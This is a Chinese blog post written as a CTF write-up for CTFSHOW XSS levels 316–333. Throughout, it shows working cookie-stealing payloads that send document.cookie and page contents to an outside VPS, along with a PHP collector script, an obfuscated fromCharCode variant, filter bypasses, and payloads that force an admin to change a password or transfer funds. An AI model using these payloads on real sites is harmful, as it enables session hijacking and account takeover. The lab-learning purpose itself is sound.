<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="CTFSHOW-XSS, marin的小窝">
    <meta name="description" content="XSSweb 316XSS 题，网页给了提示，反射型 XSS
填入简单的 payload
&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;&amp;#x2F;script&amp;gt;

显示不是 admin，这里是看 w">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>CTFSHOW-XSS | marin的小窝</title>
    <link rel="icon" type="image/jpeg" href="/favicon.jpg">
    


    <!-- bg-cover style     -->



<link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
<link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
<link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
<link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
<link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
<link rel="stylesheet" type="text/css" href="/css/matery.css">
<link rel="stylesheet" type="text/css" href="/css/my.css">
<link rel="stylesheet" type="text/css" href="/css/dark.css" media="none" onload="if(media!='all')media='all'">




    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
    <link rel="stylesheet" href="/css/post.css">




    
        <link rel="stylesheet" type="text/css" href="/css/reward.css">
    



    <script src="/libs/jquery/jquery-3.6.0.min.js"></script>

<meta name="generator" content="Hexo 8.1.1"></head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">marin的小窝</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>主页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>类型</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于我</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友链</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
  <li>
    <a href="javascript:;" class="waves-effect waves-light" onclick="switchNightMode()" title="深色/浅色模式" >
      <i id="sum-moon-icon" class="fas fa-sun" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">marin的小窝</div>
        <div class="logo-desc">
            
            一个学习网安的小菜鸡
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			主页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			类型
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于我
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友链
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/0CAF98339D62431A38257026CDE441C1.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">CTFSHOW-XSS</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/web/">
                                <span class="chip bg-color">web</span>
                            </a>
                        
                            <a href="/tags/%E5%88%B7%E9%A2%98/">
                                <span class="chip bg-color">刷题</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/CTFSHOW/" class="post-category">
                                CTFSHOW
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2025-07-30
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="/libs/prism/prism.css">
        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="XSS"><a href="#XSS" class="headerlink" title="XSS"></a>XSS</h1><h3 id="web-316"><a href="#web-316" class="headerlink" title="web 316"></a>web 316</h3><p>XSS 题，网页给了提示，反射型 XSS</p>
<p>填入简单的 payload</p>
<pre class="line-numbers language-markup" data-language="markup" data-start="1"><code class="language-markup">&lt;script&gt;alert(document.cookie)&lt;&#x2F;script&gt;</code></pre>

<p>显示不是 admin，这里是看 wp 的，和之前做 burplab 不同的地方，这里需要XSS 的不是自己的信息，这里有一个后台的 bot ，会访问你的 XSS 代码，所以需要获取他的信息</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250731151415-20260228215258-w3lvnw9.png" alt="image"></p>
<p>这里利用 vps 创建一个 php 服务，让用户访问时带上一个参数</p>
<pre class="line-numbers language-php" data-language="php" data-start="1"><code class="language-php">&lt;?php
$content &#x3D; $_GET[&#39;cookie&#39;];
if(isset($content))&#123;
        file_put_contents(&#39;.&#x2F;flag.txt&#39;,$content);
&#125;else&#123;
        echo &#39;no thing&#39;;
&#125;</code></pre>

<p>然后创建服务</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">php -S 0.0.0.0:8080</code></pre>

<p>接着使用这个 payload 发送上去，bot 就会触发这个，将 cookie 给到 vps</p>
<pre class="line-numbers language-markup" data-language="markup" data-start="1"><code class="language-markup">&lt;script&gt;location.href&#x3D;&quot;http:&#x2F;&#x2F;101.35.151.42:8080&#x2F;index.php?cookie&#x3D;&quot;+document.cookie&lt;&#x2F;script&gt;</code></pre>

<blockquote>
<p><code>location.href</code> ：将页面重定向到后面的 url</p>
</blockquote>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250731174113-20260228215258-1wx8udd.png" alt="image"></p>
<p>‍</p>
<h3 id="web-317"><a href="#web-317" class="headerlink" title="web 317"></a>web 317</h3><p>这里应该是过滤了 <code>script</code>，没有效果</p>
<p>用 <code>onerror</code> 成功</p>
<pre class="line-numbers language-markup" data-language="markup" data-start="1"><code class="language-markup">&lt;img src&#x3D;&quot;&quot; onerror&#x3D;alert(&quot;1&quot;)&gt;</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250731175210-20260228215258-m8x2vl1.png" alt="image"></p>
<pre class="line-numbers language-markup" data-language="markup" data-start="1"><code class="language-markup">&lt;img src&#x3D;&quot;&quot; onerror&#x3D;location.href&#x3D;&quot;http:&#x2F;&#x2F;101.35.151.42:8080&#x2F;index.php?cookie&#x3D;&quot;+document.cookie&gt;</code></pre>

<p>成功</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250731175405-20260228215258-8s1gut6.png" alt="image"></p>
<p>‍</p>
<h3 id="web-318"><a href="#web-318" class="headerlink" title="web 318"></a>web 318</h3><p>不清楚是过滤了 <code>img</code>​ 还是 <code>onerror</code></p>
<p>使用 <code>body</code>​ 配合 <code>onload</code> 就行</p>
<pre class="line-numbers language-markup" data-language="markup" data-start="1"><code class="language-markup">&lt;body onload&#x3D;alert(&quot;1&quot;)&gt;</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250731200914-20260228215259-ntgdfml.png" alt="image"></p>
<pre class="line-numbers language-markup" data-language="markup" data-start="1"><code class="language-markup">&lt;body onload&#x3D;location.href&#x3D;&quot;http:&#x2F;&#x2F;101.35.151.42:8080&#x2F;index.php?cookie&#x3D;&quot;+document.cookie&gt;</code></pre>

<p>成功拿到<br>这里突然发现，好像都不用写 php ，直接在 url 里看就行（</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250731201032-20260228215259-nsjm0qj.png" alt="image"></p>
<hr>
<p>这里学到一个奇怪的绕过方法</p>
<pre class="line-numbers language-markup" data-language="markup" data-start="1"><code class="language-markup">&lt;body οnlοad&#x3D;document.write(String.fromCharCode(60,115,99,114,105,112,116,62,100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,46,104,114,101,102,61,39,104,116,116,112,58,47,47,49,48,49,46,51,53,46,49,53,49,46,52,50,58,56,48,56,48,47,105,110,100,101,120,46,112,104,112,63,99,111,111,107,105,101,61,39,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,60,47,115,99,114,105,112,116,62));&gt;</code></pre>

<blockquote>
<p><code>document.write()</code>：将字符串写入 HTML 页面中</p>
<p><code>String.fromCharCode</code>：将 ascii 转化为字符串</p>
</blockquote>
<p>所以这个就相当于</p>
<pre class="line-numbers language-markup" data-language="markup" data-start="1"><code class="language-markup">&lt;body οnlοad&#x3D;document.write(String.fromCharCode(
&lt;script&gt;document.location.href&#x3D;&#39;http:&#x2F;&#x2F;101.35.151.42:8080&#x2F;index.php?cookie&#x3D;&#39;+document.cookie&lt;&#x2F;script&gt;
);&gt;</code></pre>

<p>随便写个脚本就行</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">code &#x3D; &quot;&lt;script&gt;document.location.href&#x3D;&#39;http:&#x2F;&#x2F;101.35.151.42:8080&#x2F;index.php?cookie&#x3D;&#39;+document.cookie&lt;&#x2F;script&gt;&quot;

for  i in code :
    asc &#x3D; ord(i)
    print(asc,end&#x3D;&#39;,&#39;)</code></pre>

<p>‍</p>
<p>‍</p>
<h3 id="web-319"><a href="#web-319" class="headerlink" title="web 319"></a>web 319</h3><p>不清楚过滤了什么，但是 body 照样能用</p>
<p>‍</p>
<h3 id="web-320"><a href="#web-320" class="headerlink" title="web 320"></a>web 320</h3><p><del>body 被过滤了，但是是配合</del>  <del>​<code>&lt;&gt;</code>​</del> ​ <del>就被 waf</del></p>
<p>搞错了，是过滤了空格，使用注释 <code>/**/</code> 来绕过，一些经常用的空格绕过方法好像都行</p>
<pre class="line-numbers language-markup" data-language="markup" data-start="1"><code class="language-markup">&lt;body&#x2F;**&#x2F;onload&#x3D;alert(&quot;1&quot;)&gt;</code></pre>

<pre class="line-numbers language-markup" data-language="markup" data-start="1"><code class="language-markup">&lt;body&#x2F;**&#x2F;onload&#x3D;location.href&#x3D;&quot;http:&#x2F;&#x2F;101.35.151.42:8080&#x2F;index.php?cookie&#x3D;&quot;+document.cookie&gt;</code></pre>

<p>‍</p>
<h3 id="web-321-326"><a href="#web-321-326" class="headerlink" title="web 321-326"></a>web 321-326</h3><p>同上一题，难绷，搞这么多反射型的，但是一个 paylaod 过完了</p>
<p>‍</p>
<h3 id="web-327"><a href="#web-327" class="headerlink" title="web 327"></a>web 327</h3><p>到存储型 XSS 了，这里测试了一会发现一直网络拥堵，还以为不是这个漏洞点，后面看了下 wp 发现是收件人要是 admin ，有点妹想到</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250801102206-20260228215259-dtkpe2n.png" alt="image"></p>
<p>最后用之前的 payload 就行，这题没有过滤什么东西</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&lt;script&gt;location.href&#x3D;&quot;http:&#x2F;&#x2F;101.35.151.42:8080&#x2F;index.php?cookie&#x3D;&quot;+document.cookie&lt;&#x2F;script&gt;</code></pre>

<p>‍</p>
<h3 id="web-328"><a href="#web-328" class="headerlink" title="web 328"></a>web 328</h3><p>有一个注册页面，发现在用户管理页面管理员是可以看到用户名的，所以应该是在用户名的地方进行 XSS</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250801103029-20260228215259-y9a696e.png" alt="image"></p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&lt;script&gt;location.href&#x3D;&quot;http:&#x2F;&#x2F;101.35.151.42:8080&#x2F;index.php?cookie&#x3D;&quot;+document.cookie&lt;&#x2F;script&gt;</code></pre>

<p>从管理员那里先拿到 cookie</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250801103132-20260228215259-yveab68.png" alt="image"></p>
<p>然后访问，但是因为有这个东西，一直访问的时候就跳转了（</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250801103301-20260228215259-2ebm3fe.png" alt="image"></p>
<p>只能用 burp 拦截了</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250801104255-20260228215259-ph8tkuz.png" alt="image"></p>
<p>‍</p>
<h3 id="web-329"><a href="#web-329" class="headerlink" title="web 329"></a>web 329</h3><p>这里同样拿到 cookie ，但是好像会马上失效</p>
<p>这里学到了用 XSS 获取页面的元素</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&lt;script&gt;
window.open(&#39;http:&#x2F;&#x2F;101.35.151.42:8080&#x2F;&#39;+document.getElementsByClassName(&#39;layui-table-cell laytable-cell-1-0-1&#39;)[2].innerHTML)
&lt;&#x2F;script&gt;</code></pre>

<blockquote>
<p><code>window.open</code>​：这个和 <code>location.href</code> 有区别，这个就不会出现上面的问题，会在新窗口打开页面</p>
<p><code>document.getElementsByClassName</code>：获取 HTML 页面中带有指定类名的元素</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250801122839-20260228215259-tdy8raq.png" alt="image"></p>
<p><code>innerHTML</code>​ 和 <code>outerHTML</code>​<br>​<code>innerHTML</code>​ ：获取元素内部所有的 HTML<br>​<code>outerHTML</code> ：获取元素自身和内部所有 HTML</p>
</blockquote>
<p>成功获取到 flag</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250801123158-20260228215300-hjvw22f.png" alt="image"></p>
<hr>
<p>跟着 wp 学到的第二个方法，使用 <code>jQuery</code> 选择器</p>
<pre class="line-numbers language-javascript" data-language="javascript" data-start="1"><code class="language-javascript">$(&#39;.laytable-cell-1-0-1&#39;).each(function(index,value)&#123;
	console.log(value);
&#125;);</code></pre>

<blockquote>
<p>逐个遍历 class 为 <code>.laytable-cell-1-0-1</code>​ ，因为前面看到的是 <code>layui-table-cell laytable-cell-1-0-1</code>，是有两个类的意思，这里主要获取密码这个类就行，所以用后面的那个</p>
<p><code>each</code>​ ：对当前 <code>jQuery</code>​ 选中的每一个元素执行一次指定的回调函数，就是后面的 <code>function</code>​ ，这里接收两个参数，<code>index、value</code></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250801152023-20260228215300-hh8l0rk.png" alt="image"></p>
</blockquote>
<p>利用这个构造 payload</p>
<pre class="line-numbers language-markup" data-language="markup" data-start="1"><code class="language-markup">&lt;script&gt;
$(&#39;.laytable-cell-1-0-1&#39;).each(function(index,value)&#123;
	if(value.innerHTML.indexOf(&#39;ctfshow&#123;&#39;)&gt;-1)&#123;
window.open(&#39;http:&#x2F;&#x2F;101.35.151.42:8080&#x2F;&#39;+value.innerHTML);
&#125;&#125;);
&lt;&#x2F;script&gt;</code></pre>

<blockquote>
<p><code>indexOf()</code>：这个是遍历中的条件语句，检查当前的元素中是否包含字符串，绕过包含则返回大于 -1 的索引，否则返回 -1</p>
</blockquote>
<hr>
<p><code>querySelector</code> 获取元素</p>
<p><code>querySelector</code> 是 js 中用于从文档中获取元素的方法，通过指定 CSS 选择器来查找</p>
<pre class="line-numbers language-javascript" data-language="javascript" data-start="1"><code class="language-javascript">var element &#x3D; document.querySelector(CSSselector);</code></pre>

<ul>
<li><code>CSSselector</code> 就是要查找的元素选择器</li>
</ul>
<pre class="line-numbers language-markup" data-language="markup" data-start="1"><code class="language-markup">&lt;script&gt;
var img &#x3D; new Image();
img.src &#x3D; &quot;http:&#x2F;&#x2F;101.35.151.42:8080&#x2F;&quot;+document.querySelector(&#39;#top &gt; div.layui-container &gt; div:nth-child(4) &gt; div &gt; div.layui-table-box &gt; div.layui-table-body.layui-table-main&#39;).textContent;
document.body.append(img);
&lt;&#x2F;script&gt;</code></pre>

<blockquote>
<p><code>document.body.append(img)</code>：将创建的图像元素 img 添加到页面的 body 中</p>
</blockquote>
<p>‍</p>
<h3 id="web-330"><a href="#web-330" class="headerlink" title="web 330"></a>web 330</h3><p>这里多了一个修改密码的页面</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250801150031-20260228215300-kixm6xx.png" alt="image"></p>
<p>使用上一题的 payload 发现传过来的是 <code>*</code>，使用 cookie 也不行</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250801150211-20260228215300-wntdgqo.png" alt="image"></p>
<p>使用 <code>outerHTML</code> 测试发现就是没有显示</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&lt;script&gt;
window.open(&#39;http:&#x2F;&#x2F;101.35.151.42:8080&#x2F;?cookie&#x3D;&#39;+document.getElementsByClassName(&#39;layui-table-cell laytable-cell-1-0-1&#39;)[6].outerHTML)
&lt;&#x2F;script&gt;</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250801150301-20260228215300-poj2iq4.png" alt="image"></p>
<p>都走不通感觉就是要修改 admin 的密码去登录，修改密码，抓包</p>
<p>发现用的是这个路由修改的，那就让 bot 自己修改密码</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250801153234-20260228215300-o5r62io.png" alt="image"></p>
<p>然后使用这个 payload 就可以修改 admin 的密码</p>
<pre class="line-numbers language-markup" data-language="markup" data-start="1"><code class="language-markup">&lt;script&gt;
window.location.href&#x3D;&#39;http:&#x2F;&#x2F;127.0.0.1&#x2F;api&#x2F;change.php?p&#x3D;123&#39;;
&lt;&#x2F;script&gt;</code></pre>

<pre class="line-numbers language-markup" data-language="markup" data-start="1"><code class="language-markup">&lt;script&gt;
window.open(&#39;http:&#x2F;&#x2F;127.0.0.1&#x2F;api&#x2F;change.php?p&#x3D;123&#39;);
&lt;&#x2F;script&gt;</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250801153704-20260228215300-cw47uji.png" alt="image"></p>
<h3 id="web-331"><a href="#web-331" class="headerlink" title="web 331"></a>web 331</h3><p>抓包看到这里的请求变成了 post 请求</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250801165258-20260228215300-zpsar62.png" alt="image"></p>
<pre class="line-numbers language-markup" data-language="markup" data-start="1"><code class="language-markup">&lt;script&gt;
$.ajax(&#123;url:&quot;&#x2F;api&#x2F;change.php&quot;,method:&quot;POST&quot;,data:&#123;&#39;p&#39;:&#39;123&#39;&#125;&#125;);
&lt;&#x2F;script&gt;</code></pre>

<blockquote>
<p><code>$.ajax()</code>​：这个是 <code>jQuery</code> 中的一个方法，用于发起异步 HTTP 请求</p>
</blockquote>
<p>成功获取</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250801170529-20260228215300-oxm9h76.png" alt="image"></p>
<p>‍</p>
<h3 id="web-332"><a href="#web-332" class="headerlink" title="web 332"></a>web 332</h3><p>多了一个转账汇款的功能，猜测就是让 admin 用户给你转账</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250801170842-20260228215301-gea3gpa.png" alt="image"></p>
<p>测试的时候发现了几个问题，一个就是登录的时候去购买 flag 依旧显示先登录，并且在转账的时候显示有内鬼</p>
<p>这里是转账的请求</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250801171854-20260228215301-tt9bwtp.png" alt="image"></p>
<pre class="line-numbers language-markup" data-language="markup" data-start="1"><code class="language-markup">&lt;script&gt;
$.ajax(&#123;url:&quot;&#x2F;api&#x2F;amount.php&quot;,method:&quot;POST&quot;,data:&#123;&#39;u&#39;:&#39;1&#39;,&#39;a&#39;:&#39;9999&#39;&#125;,success:function(response)&#123;window.open(&#39;http:&#x2F;&#x2F;101.35.151.42:8080&#x2F;&#39;+response)&#125;,error:function()&#123;window.open(&#39;http:&#x2F;&#x2F;101.35.151.42:8080&#x2F;error&#39;)&#125;&#125;);
&lt;&#x2F;script&gt;</code></pre>

<p>难绷，拿到了这个还是让我先登录，服了（</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250801172105-20260228215301-8cuflu7.png" alt="image"></p>
<p>那试试让 admin 去拿</p>
<pre class="line-numbers language-markup" data-language="markup" data-start="1"><code class="language-markup">&lt;script&gt;
$.ajax(&#123;url:&quot;&#x2F;api&#x2F;getFlag.php &quot;,method:&quot;POST&quot;,success:function(response)&#123;window.open(&#39;http:&#x2F;&#x2F;101.35.151.42:8080&#x2F;&#39;+response)&#125;,error:function()&#123;window.open(&#39;http:&#x2F;&#x2F;101.35.151.42:8080&#x2F;error&#39;)&#125;&#125;);
&lt;&#x2F;script&gt;</code></pre>

<p>得，返回来一个 admin 不需要 flag</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250801172326-20260228215301-24lbo71.png" alt="image"></p>
<p>我晕了，是账户的问题，换一个账户名就行，不能用1什么的</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250801173951-20260228215301-e00ovdd.png" alt="image"></p>
<p>然后这里有一个非预期，给 admin 账户转 <code>-100000</code>​ ，就会变成正的，逻辑好像是 <code>5-(-100000)</code> 然后变成正的</p>
<p>‍</p>
<h3 id="web-333"><a href="#web-333" class="headerlink" title="web 333"></a>web 333</h3><p>这个好像就是修复了上一题的非预期，但是我的 payload 没有问题</p>
<pre class="line-numbers language-markup" data-language="markup" data-start="1"><code class="language-markup">&lt;script&gt;
$.ajax(&#123;url:&quot;&#x2F;api&#x2F;amount.php&quot;,method:&quot;POST&quot;,data:&#123;&#39;u&#39;:&#39;23&#39;,&#39;a&#39;:&#39;9999&#39;&#125;,success:function(response)&#123;window.open(&#39;http:&#x2F;&#x2F;101.35.151.42:8080&#x2F;&#39;+response)&#125;,error:function()&#123;window.open(&#39;http:&#x2F;&#x2F;101.35.151.42:8080&#x2F;error&#39;)&#125;&#125;);
&lt;&#x2F;script&gt;</code></pre>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">Marin</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://wwwmarin.xyz/2025/07/30/ctfshow-xss/">https://wwwmarin.xyz/2025/07/30/ctfshow-xss/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">Marin</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/web/">
                                    <span class="chip bg-color">web</span>
                                </a>
                            
                                <a href="/tags/%E5%88%B7%E9%A2%98/">
                                    <span class="chip bg-color">刷题</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2025/07/31/linux/">
                    <div class="card-image">
                        
                        <img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/A49509B4D767F4369527F90DE4678504.jpg" class="responsive-img" alt="linux 基础">
                        
                        <span class="card-title">linux 基础</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2025-07-31
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/linux/" class="post-category">
                                    linux
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/linux/">
                        <span class="chip bg-color">linux</span>
                    </a>
                    
                    <a href="/tags/%E5%9F%BA%E7%A1%80/">
                        <span class="chip bg-color">基础</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2025/07/26/ctfshow-ssti/">
                    <div class="card-image">
                        
